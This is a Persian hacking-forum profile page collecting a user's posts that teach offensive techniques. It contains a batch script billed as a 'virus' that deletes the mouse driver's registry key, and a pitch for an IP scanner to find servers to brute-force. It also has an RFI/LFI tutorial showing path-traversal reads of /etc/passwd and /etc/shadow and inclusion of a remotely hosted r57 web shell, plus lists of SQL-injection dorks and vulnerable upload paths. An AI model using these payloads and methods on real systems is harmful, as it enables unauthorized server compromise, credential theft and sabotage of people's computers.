رفتن به مطلب
امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند



iran rules jazbe modir
snapphost mahak

eblis98

 عضو فعال
  • تعداد ارسال ها

    46
  • میانگین پستها در طول روز

    0
  • امتیاز

  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    1

آخرین بار برد eblis98 در 5 دی 1396

eblis98 یکی از رکورد داران بیشترین تعداد پسند مطالب است !

1 دنبال کننده

درباره eblis98

  • درجه
    █▒▒▒▒▒▒▒▒▒ %4

مشخصات کاربر

  • جنسیت
    آقا

آخرین بازدید کنندگان نمایه

280 بازدید کننده نمایه
  1. در بیشتر حملات مخفی ماندن از سیستم های امنیتی یکی از اولین معیار های یک هکر هست. موضوع ما در مورد به اشتباه انداختن سیستم امنیتی برای شناسایی شما در نقطه ای که به فعالیت میپردازید می باشد. برنامه های زیادی برای این کار به وجود امدند و مورد استفاده قرار میگیرند ولی گاهی شما مجبورید فقط متکی به توانایی فردی خود باشید و امروز بحث اصلی در این باره هست اگر بخواهیم در یک جمله شناسایی را در نقطه مورد نظر تعریف کنیم شناسایی IP و ِDNS Server هست قبل توضیح این دو کلمه یک اخطار لازم است در این روش شما فقط قادرید که ایپی خود را در رنج معینی تغییر دهید که باید مطمئن شوید که این ایپی در حال حاضر روی خط انلاین نیست که من مرحله به مرحله توضیح میدم واژه IP : در توضیح ایپی باید گفت که یک شمارهی دو دویی ۳۲ بیتی و ۴ بایتی هست که به کامپیوتر متصل به شبکه اختصاص داده میشود که با این شماره شناسایی میشود برای مثال xxx.xxx.xxx.xxx که این xxx ها از ۰تا ۲۵۵ متغییر هست و هرکدام به چیز خاصی اطلاق میشود پس هر کامپیوتر متصل به شبکه حتی سرور سایت ها و ISP ها خو با یک ایپی خاص شناسایی میشوند واژه DNS Server : که متعلق یه شبکه ی اصلی است و اصل شناسایی کشور از روی این شماره صورت میگیرید اما برای فهم بهتر این مطالب دستورات زیر را اجرا کنید ۱) باز کردن پنجره ی run از قسمت start ویندوز ۲) تایپ کنید cmd و سپس Enter ۳) حا پبنجره سیاه مانند cmd برای شما باز شده کلمات زیز را به دقت تایپ کنید ipconfig/all ۴) مشخصات کامل اتصا شما به شبکه نمایان میشود ۵) راه دیگر اینکه در داخل پنجره run این عبارات را به دقت تایپ کنید winipcfg توجه داشته باشید که این راه در ویندوز XP کاربردی ندارد اما سئوالی که ممکن است پیش بیاید این است که چطور بفهمیم که یک ip روی خط است یا خیر؟ در جواب باید گفت که یکی از دستورات مخفی MSDos که اصولآ زیاد توضیح داده نمیشود دستور ping است که به راحتی هم ایپی مورد نظر ما را را از لحاظ on یا off بودن چک میکند و هم در بعضی از موارد نیاز به ایپی داریم ، ایپی را بدست می اورد برای اجرای این دستور مراحل زیر را اجرا کنید ==> ۱) وارد run در start ویندوز شوید ۲) تایپ کنید command و سپس enter کنید ۳) سپس صفحه ی سیاه MSDosظاهر میشود ۴) تایپ کنید ping xxx.xxx.xxx.xxx و به جای xxx ایپی در رنج ایپی خودتان در نظر بگیرید و اینتر کنید حا متوجه میشود که این ایپی در روی خط هست یا خیر ؟ واژه ping : یک فرمان تحت داس است که پس از اجرا از طرف کامپیوتر ما چها بسته حاوی اطلاعات اولیه به حجم به کامپیوتر مربوطه به ای پی یا ادرس مقص فرستاده میشود و ظرف چند صدم ثانیه به کامپیوتر شما برگشت داده میشود طی این عمل ایپی وربوطه برای ما فرستاده میشود در اینجا لازم به ذکر است که کار اصلی فرمان ping چیزی غیر از پیدا کردن و فرستادن ایپی برای ما است اما اصل کار عوض کردن ایپی خودتان : برای ویندوز xp وارد cmd شوید و برای سایر ویندوز ها وارد command شوید تایپ کنید ipconfig/all حال به وسیله دستور ping چک کنید ایپی مورد نظرتان روی خط نباشد اگر جواب برگشتی برای شما Time out بود یعنی ایپی on نیست و شما میتوانید به عنوان ip جایگزین برای خود استفده کنید فقط دقت داشته باشید که این ایپی در رنج ایپی شما باشد و مراحل زیر را دنبال کنید : ۱) به Control Panel بروید ۲) به Network Connection بروید ۳) بر روی Connection که الان از ان استفاده میکنید کنید و به Properties بروید ۴) به Network رفته Properties را انتخاب کنید ۵) در بالا این گزینه را انتخاب کنید Up the Following Ip Address ۶) ایپی مورد نظر را در قسمت Ip Address بنویسید و در پایین اطلاعات را مطابق فرمان قبلی (Ipconfig/all ) تنظیم کنید حال ایپی شما عوض میشود.
  2. سلام آموزش ویروس از کار انداختن موس کد های زیر را به فرمت bat ذخیره کنید rem Disable Mouse set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4 غیر فعالسازی تغییر عدد ۴ به ۳ آنتی ویروس این فایل رو به عنوان ویروس غیرفعال کردن موس میشناسه
  3. ابزار اسکن کردن رنج آی پی ها این ابزار برای شما رنج آی پی ها را اسکن میکند. کار این ابزار به این صورت است که شما رنج آی پی ها را به نرم افزار می دهید و نرم افزار برای شما آی پی های فعال در رنج آی پی را مشخص میکند. شما همچنین میتوانید از این نرم افزار به عنوان اسکن سرور های مجازی استفاده کنید. یعنی پس از دریافت رنج آی پی ها و قرار دادن آن ها در نرم افزار, آی پی سرور های مجازی را دریافت کنید و اقدام به کرک آن ها کنید. شما میتوانید آی پی های سرور با سیتسم عامل های Unix, Linux, Windows را در این نرم افزار بدست آورید و با ابزاری همچون NLBrute و یا DUBrute اقدام به کرک آن ها کنید. لینک دانلود نرم افزار: این جا کلیک کنید
  4. با سلام آموزش هک سایت با باگ های rfi و lfi ین باگها یکی از بهترین باگها جهت هک سایت هستند اگر چه یکم قدیمی است اما آنقدر تارگت دارد که اگر نیم ساعت خود را برای پیدا کردن تارگت های این باگ اختصاص بدهید ۱۰۰ تارگت پیدا میکنید… RFI مخفف Remote File Include و LFI مخفف Local file Include است یعنی دسترسی برای خواندن فایل ها اسکریپت ها …یک سایت. این باگ هنگامی بوجود میاید که برنامه نویس سایت دچار اشتباه در استفاده از دستورات فراخوانی در PHP میشود و هکر میتواند که دسترسی غیری مجاز به فایل های مانند config.php etc/passwd پیدا کند نحوه استفاده از این باگ مختلف میباشد مثلا شما میتوانید با خلاقیت خود از این باگ در سایت های مختلف استفاده کنید من کوشش میکنم که استفاده از این باگها را بشکل عمومی آموزش بدم … برای پیدا کردن target که دارای باگ باشد شما نیاز به دورک های RFI/LFI دارید من تمامی دورک های این باگ را در آدرس زیر قرار داده ام که شما میتوانید مشاهده کنید: http://facegroup.nazuka.net/RFI Dorks.txt من دورک زیر را انتخاب کردم: index.php?site=… این دورک یکی از بهترین و پرکاربردترین دورکی RFI/LFI است خوب من Target خودwww.site.com را انتخاب میکنم حالا دورک را به آدرس این تارگیت اضافه میکنم:www.site.com/index.php?site=command من در آخر آدرس این سایت بخاطری Command نوشتم که شما در همین محل دستورات خود را اجرا میکنید ما میتوانیم در این قسمت فایل های خودی سایت را فراخوانی کنیم ویا با استفاده از یک لینک دیگر شل خودمون را بریزیم توی سایت و یا لیست etc/passwd را بخوانیم….باید توجه داشته باشید که لینک شل شما txt باشه نه PHP مانند این لینک: http://www.site.com/index.php?site=h….com/shell.txt برای اینکه بفهمیم این سایت باگ دارد یانه در آدرس سایت بعوض command اسمی صفحه اصلی سایت را مینویسیم: www.site.com/index.php?site=index.php اگر فایل index.php بدون کدام مشکل اجرا شد پس سایت باگ دارد همچنان میتوانید برای اینکه بفهمید سایت باگ داره یا نه عبارت qwe را در آدرس سایت بنویسید: www.site.com/index.php?site=qwe حالا با وارد کردن این عبارت اگر سایت باگ داشت با Warning روبرو میشوید و اگر باگ نداشت صفحه سایت بدون کدام مشکل بالا میاد. بعد از اینکه یک Target خوب پیدا کردید مراحل بعدی را تعقیب کنید: در این قسمت من به شما آموزش میدم چجوری محتویات فایل های مهم سرور را بخوانید و دستورات خود را اجرا کنید به لینک سایت هدف عبارت زیر را اضافه کنید: www.site.com/index.php?site=../etc/passwd www.site.com/index.php?site=../etc/shadow http://www.site.com/index.php?site=….security/group www.site.com/index.php?site=../etc/security/user هر یک از فابل های بالا خیلی خیلی مهم است اگر اسن فابل های یک سایت را توانستید بخوانید دیگه کاری سایت تموم است من در قسمت بالا از یک …/ کار گرفتم شما باید به اندازه پوشه های که توش هستید از ../ کار بگیرید من صرف یک پوشه از Root سایت در لینک بالا فاصله دارم که اون پوشه site است اگر سایت شما لینکش مانند این لینک بود: www.site2.com/bb/cc/h1/index.php شما باید از ../../../../ کار بگیرید یعنی چهار پوشه به عقب میروید تا به root سایت دسترسی داشته باشید اگر از لینک بالا بخواهیم فایل etc/passwd را بخواینم اینکار را میکنیم: http://www.site2.com/bb/cc/h1/index…./../etc/passwd دیدید که من از ../../../../ استفاده کردم برای اینکه بتوانید یک وب هکر حرفه ای شوید باید حتما PHP را بلد باشید در ضمن یک لوکال هاست را نیز بروی کامپیوتری خود نصب کنید… ار میخواهید که شل خودتون را بروی سرور سایت نصب کنید باید پسوند شل خود را از .php به .txt تغییر بدهید و بعد در یک هاست آپلودش کنید و آدرس شل خود را در آخر لینک سایت هدف بنویسید و بعد واردی اون لینک شوید خواهید دید که شل شما اجرا شده ….به مثال پایین دقت کنید: shell name:r57.php changed name:r57.txt shell Address:www.yourhost.com/r57.txt target URL:www.site.com/index.php?=here past your shell address hack link:www.site.com/index.php?=www.yourhost.com/r57.txt Now run Your Shell !!! خوب امیدوارم که از مثال بالا فهمیده باشید که چجوری شل خودتون را با استفاده از باگ LFI/RFI روی سرور سایت آپلود کنید...
  5. sql

    inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:Pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= چند دروک جدید و کار امد
  6. سلام دروک جدید باگ فیک ادیتور رو اماده کردم امید وارم لزت ببرین # URL with 404 errors - Hits - Last URL referer BEGIN_SIDER_404 276 /backup/bigdump.php 1 - /w/wp-content/themes/enviro/r/img/loading.gif 70 /admin/editor/filemanager/connectors/uploadtest.html 1 - /admin.php 6 - /includes/fckeditor/editor/filemanager/connectors/php/connector.php 1 - /mysqladmin/ 2 - /ckeditor/ckfinder/core/connector/php/connector.php 1 - /bigdump.php 1 - /shop/js/mage/cookies.js 1 /include/fckeditor/editor/filemanager/connectors/uploadtest.html 1 - /openemr-4.1.1/library/openflashchart/php-ofc-library/ofc_upload_image.php 1 - /fckeditor/editor/filemanager/upload/aspx/upload.aspx 1 - /xmlrpc.php 1 - /fckeditor/editor/filemanager/connectors/php/upload.php 1 - /fckeditor/editor/filemanager/browser/default/connectors/test.html 1 - /cgi-sys/php5 1 ()%20{%20: /stats/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php 1 - /ckeditor/ckfinder/core/connector/aspx/connector.aspx 1 - /FCKeditor/editor/filemanager/connectors/test.html 1 - /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx 1 - /assets/uploadify/uploadify.css 1 - /includes/fckeditor/editor/filemanager/connectors/php/upload.php 1 - //wp-login.php 3 - /myadmin/ 2 - /awstats/icon/mime/index.php 1 /administrator/ 5 - /editor/filemanager/browser/default/connectors/test.html 1 - /includes/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/for_tinymce.js 1 - /wp-login.php 33 - /includes/php-ofc-library/ofc_upload_image.php 1 - /database/bigdump.php 1 - /phpmy/ 2 - /sites/all/libraries/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/for_tinymce.js 1 - /sites/default/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php 1 - /admin/filebrowser/uploadify/uploadify.css 1 - /public/js/FCKeditor/editor/filemanager/upload/test.html 1 - /tiny_mce/plugins/tinybrowser/readme.txt 1 - /assets/plugins/tinymce/jscripts/tiny_mce/plugins/tinybrowser/readme.txt 1 - /wp-includes/js/tinymce/utils/mctabs.js 1 - /admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp 1 - filemanager/browser/default/connectors/php/connector.php 1 - /admin/editor/filemanager/upload/test.html 1 - /FCKeditor/editor/filemanager/connectors/uploadtest.html 2 - /plugins/ 1 - /fckeditor/editor/filemanager/connectors/aspx/connector.aspx 1 - /mod/tinymce/jscripts/tiny_mce/plugins/tinybrowser/readme.txt 1 - /phpmyadmin/ 2 - /kcfinder/browse.php 1 - /mysql/ 1 - /wp-images/wpminilogo.png 1 - /admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx 1 - /tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/for_tinymce.js 1 - /myadmin/scripts/setup.php 2 - /admin/mysql/ 2 - /blog/wp-login.php 5 - /FCKeditor/editor/filemanager/upload/test.html 1 - /includes/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx 1 - /webmanage/fckeditor/editor/filemanager/browser/default/connectors/test.html 1 - /manage/editor/filemanager/browser/default/connectors/test.html 3 - /site/wp-login.php 5 - /editor/filemanager/connectors/uploadtest.html 1 - /admin/system/editor/FCKeditor/editor/fckeditor.Html 1 - /system/fckeditor/editor/filemanager/connectors/uploadtest.html 1 - /app/webroot/js/tiny_mce/plugins/tinybrowser/readme.txt 1 - /mysql/bigdump.php 1 - /libs/open-flash-chart/php-ofc-library/ofc_upload_image.php 1 - /includes/fckeditor/editor/filemanager/connectors/asp/upload.asp 1 - /tiny_mce/plugins/ajaxfilemanager/jscripts/for_tinymce.js 1 - /public/js/FCKeditor/editor/filemanager/connectors/uploadtest.html 1 - /js/FCKeditor/editor/filemanager/connectors/uploadtest.html 1 - /ckeditor/ckfinder/core/connector/asp/connector.asp 1 - /js/fckeditor/editor/filemanager/connectors/uploadtest.html 1 - /fckeditor/editor/filemanager/connectors/asp/upload.asp 1 - /js/tiny_mce/plugins/tinybrowser/readme.txt 1 - /sites/all/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php 1 - /webeditor/editor/filemanager/connectors/test.html 1 - /wp/wp-login.php 5 - /bigdump/bigdump.php 1 - /admin/js/uploader/uploadify.css 1 - /js/FCKeditor/editor/filemanager/upload/test.html 1 - /admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx 1 - /includes/jscripts/tiny_mce/plugins/tinybrowser/readme.txt 1 - /admin/js/fckeditor/editor/filemanager/connectors/uploadtest.html 1 - /civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php 1 - /data/scripts/tiny_mce/plugins/tinybrowser/readme.txt 1 - /js/tiny_mce/plugins/ajaxfilemanager/jscripts/for_tinymce.js 1 - /sites/all/modules/fckeditor/fckeditor/editor/filemanager/connectors/uploadtest.html 1 - /sites/all/libraries/tinymce/jscripts/tiny_mce/plugins/tinybrowser/readme.txt 1 - /editor/filemanager/connectors/test.html 1 - لایک فراموش نشه -_-
×